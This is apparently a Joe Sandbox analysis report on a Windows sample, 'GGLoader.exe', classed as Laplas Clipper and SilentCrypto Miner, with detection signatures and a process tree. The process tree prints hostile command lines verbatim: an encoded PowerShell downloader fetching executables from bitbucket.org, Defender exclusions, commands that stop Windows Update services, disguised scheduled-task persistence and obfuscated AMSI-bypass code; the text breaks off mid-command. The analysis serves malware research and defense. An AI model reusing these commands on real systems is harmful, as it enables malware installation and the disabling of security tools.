Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GGLoader.exe

Overview

General Information

Sample name:GGLoader.exe
Analysis ID:1526110
MD5:982e4ae4559538cfb529dfaff0507880
SHA1:a3b0e3989d6e40792134286e40448004ebeda077
SHA256:95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd
Infos:

Detection

Laplas Clipper, SilentCrypto Miner
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Laplas Clipper
Yara detected Powershell download and execute
Yara detected SilentCrypto Miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary or sample is protected by dotNetProtector
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops large PE files
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found stalling execution ending in API Sleep call
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • GGLoader.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\GGLoader.exe" MD5: 982E4AE4559538CFB529DFAFF0507880)
    • powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAG0AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB1AGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQA8ACMAdABhAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB1AG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAbgBqAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB4AGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAbQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAFMAZQBuAGQALgBlAHgAZQAnACkAPAAjAGQAbgBnACMAPgA=" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LicCheck.exe (PID: 7932 cmdline: "C:\Users\user\AppData\Local\Temp\LicCheck.exe" MD5: 726A5B76F4C40551741FFDDA14088CE3)
        • schtasks.exe (PID: 7768 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LicSend.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Local\Temp\LicSend.exe" MD5: 4648D5EF582C7B17D9712F5B5B60F046)
        • dialer.exe (PID: 916 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • powershell.exe (PID: 8052 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5460 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4464 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7532 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7496 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7700 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5432 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • reg.exe (PID: 7224 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 4884 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 2032 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 2000 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 4564 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 5672 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5052 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7504 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7468 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7460 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 3760 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svcupdater.exe (PID: 7904 cmdline: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe MD5: 60EF19D1B9B74D6AAD6007EBBF88CDF3)
  • powershell.exe (PID: 8068 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](114)+''+[Char](74)+''+[Char](69)+''+[Char](69)+''+[Char](85)+''+[Char](99)+''+'T'+'');$WfnyPndttaFlQY=$fxvCjurJEEUcT.GetMethod(''+[Char](87)+''+[Char](102)+'n'+'y'+''+'P'+''+'n'+''+'d'+''+'t'+''+'t'+''+[Char](97)+''+[Char](70)+'l'+[Char](81)+'Y',[Reflection.BindingFlags]''+[Char](80)+'u'+'b'+'l'+'i'+''+[Char](99)+''+','+''+[Char](83)+'ta'+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JjiXXwpbbbrjfbPnDMc=NGLbonfBsuNR @([String])([IntPtr]);$BLVFENqGmioLfqvbpVmToD=NGLbonfBsuNR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LGtHULICQkP=$fxvCjurJEEUcT.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$MCfPqlHPuVRchK=$WfnyPndttaFlQY.Invoke($Null,@([Object]$LGtHULICQkP,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$OyytwRheaSYqFgycC=$WfnyPndttaFlQY.Invoke($Null,@([Object]$LGtHULICQkP,[Object]('Vir'+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$TWYbqKR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MCfPqlHPuVRchK,$JjiXXwpbbbrjfbPnDMc).Invoke(''+[Char](97)+'m'+'s'+'i'+'.'+''+[Char](100)+''+[Char](108)+'l');$yVOcIkghuDjvLnFeb=$WfnyPndttaFlQY.Invoke($Null,@([Object]$TWYbqKR,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+'f'+[Char](102)+'er')));$uCYiRUffMm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OyytwRheaSYqFgycC,$BLVFENqGmioLfqvbpVmToD).Invoke($yVOcIkghuDjvLnFeb,[uint32]8,4,[ref]$uCYiRUffMm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$yVOcIkghuDjvLnFeb,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OyytwRheaSYqFgycC,$BLVFENqGmioLfqvbpVmToD).Invoke($yVOcIkghuDjvLnFeb,[uint32]8,0x20,[ref]$uCYiRUffMm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+''+'l'+''+'e'+'rsta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8000 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 